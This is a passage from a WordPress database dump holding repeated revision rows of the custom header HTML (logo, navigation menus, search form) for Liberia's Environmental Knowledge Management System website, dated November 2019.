CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:16:30','2019-11-27 20:16:30','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2857,1,'2019-11-27 20:19:51','2019-11-27 20:19:51','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		<p>Site Language: [gtranslate]</p>Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:19:51','2019-11-27 20:19:51','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2858,1,'2019-11-27 20:20:46','2019-11-27 20:20:46','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:20:46','2019-11-27 20:20:46','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2859,1,'2019-11-27 20:21:39','2019-11-27 20:21:39','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:21:39','2019-11-27 20:21:39','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2860,1,'2019-11-27 20:24:45','2019-11-27 20:24:45','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Site Language:Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:24:45','2019-11-27 20:24:45','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2861,1,'2019-11-27 20:25:57','2019-11-27 20:25:57','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:25:57','2019-11-27 20:25:57','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2862,1,'2019-11-27 20:26:41','2019-11-27 20:26:41','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media 